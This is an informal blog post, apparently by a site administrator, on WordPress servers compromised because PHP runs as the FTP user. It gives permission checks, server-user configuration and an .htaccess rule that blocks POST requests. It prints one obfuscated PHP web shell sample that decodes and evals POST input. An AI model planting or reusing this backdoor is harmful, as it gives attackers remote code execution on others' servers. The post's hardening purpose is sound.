Problem overview:
This is ture that WordPress engine has security flaws. It is true that WordPress plugins is written without taking care of security.
Recently I had to restore many WordPress instalations due to executing malicious code on servers (like a sending mail spam via sendmail).
But many hosting providers server’s configuration SUCKS! And I will explain you why.
First: WordPress could be attacked in many ways, we will cover one of them which is related with file permissions and wrong configuration.
Some example of executing malicious code
The most common example is creating many fucking infected *.php
files (like post_3be78.php) that executing code that has been injected in $_POST
request variable. These files has obfluscated content to be unable to recognize for human eye. Example:
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n6769b6'])) {eval($s21(${$s20}['n6769b6']));}?>
The infected files may contain more cynical content but you will recognize this crap at first glance.
Server providers SUCKS!
Server providers sucks.
Thats because they runs PHP scripts from the same user that uploaded file (FTP user).
Extremely important fact:
If your scripts are executed from the FTP user = you have trouble.
How to check if your hosting provider sucks?
- Simply create a new directory via FTP.
Make sure that it have default 755 permisions, means only owner user of the directory has permissions to write new files on it. - Create a new file test.php with content below and upload to that directory:
- Show file output result by accessing it via HTTP.
http://your-site/test/test.php
If the result is bool(true)
, the script have access to write any file to directory which exisis in. Yes? DAFUQ? Who agreed to it?
The second var_dump returns the user that executes this script. If this user is the same user that is your
FTP user, the result is correct, because this user is the owner or created directory and can write to it any files.
What does it means?
Any script file executed on
server have global permissions to write anywhere. It is security flaw of server configuration.
Sevrals years ago there was a standard that it have been required to set a chmod to directories/files where we permits to write.
How to avoid server configuration security flaw?
- You are hosting provider customer.Cannot. You have you ask your administrators that they can run your php scripts as different user that is your FTP user.If they disagree, get the fuck out of your hosting provider and look up for another. Wojciech is providing such services.
- If you are administrator, just set another user to run your php scripts.
For Apache example:
Edit file /etc/apache2/envvars (or wherever you have this crap)
export APACHE_RUN_USER=www-data export APACHE_RUN_GROUP=www-data
For Nginx + php-fpm
Edit your pool configuration:
[your-pool-name] user = www-data group = www-data
Temporary fix in .htaccess
Most of infected files that executes malicious code is beeing populated by $_POST requests. This is because of more much code can be send via HTTP POST request payload, because GET payload size is limited.
You can temporarly disable POST requests to URL’s that you don’t want to receive POST requests. This will block all new infected files, because you are creating a white list, not black list.
Example .htaccess file, this responds Error 404 while sending POST requests on urls different from /wp-login.php
and /wp-admin*
# BEGIN WordPress RewriteEngine On RewriteBase / #POST requests disable RewriteCond %{REQUEST_METHOD} POST [NC] RewriteCond %{REQUEST_URI} !^/wp-login.php [NC] RewriteCond %{REQUEST_URI} !^/wp-admin [NC] RewriteRule .* - [R=404,L] RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress
That all. I hope it helped.
Can I do more?
Yes.